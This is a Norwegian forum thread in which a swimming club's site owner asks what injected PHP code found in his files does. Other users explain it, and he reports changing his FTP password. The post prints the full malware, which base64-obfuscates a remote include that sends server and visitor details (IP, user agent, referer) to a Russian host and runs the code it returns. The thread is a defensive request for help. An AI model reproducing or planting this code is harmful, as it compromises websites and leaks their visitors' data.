Jump to content
Sign in to follow this  
Christian_

Kan noen fortelle meg hva denne koden er?

Recommended Posts

Det er noen som har kødda med websiden min og lagt denne koden inn i nesten alle php-filene mine, hva betyr egentlig dene koden?

 

error_reporting(0);

$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);

$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); 

$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); 

$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); 

$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); 

$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); 

$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);

if((include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} 

else 
{include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>

 

Takker for alle svar, vil gjerne ha rettet opp dette fortest mulig

 

mvh

Christian

Share this post


Link to post
De inkluderer siden : http://user7.phpinclude.ru/ på hjemmesiden din.

5282085[/snapback]

 

Det er en underdrivelse. Den koden gjør også at en del informasjon om serveren din samt klientinfo blir sendt til den phpinclude.ru siden.

 

Pass deg for forms som ikke er sikret mot missbruk. Tror du må tette noen sikkerhetshull.

 

Jeg kan godt ta en titt hvis du har kildekoden klar.

Edited by saivert

Share this post


Link to post

Det ikke på min personlige side (Tenker på gjestebokinlegget ditt nå saivert), men en side jeg driver for den lokale svømmeklubben. Siden er satt opp av aj-fork + at jeg bruker raabok som gjestebok. Disse kodene har bligg lagt inn på en slik måte at de ikke kan ha blitt lagt inn gjennom et script. Dette må sansynligvis ha skjedd manuelt. Har skifta passord på ftp-en nå for å være helt sikker på at det ikke skjer igjen.

Share this post


Link to post

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
Sign in to follow this  

×
×
  • Create New...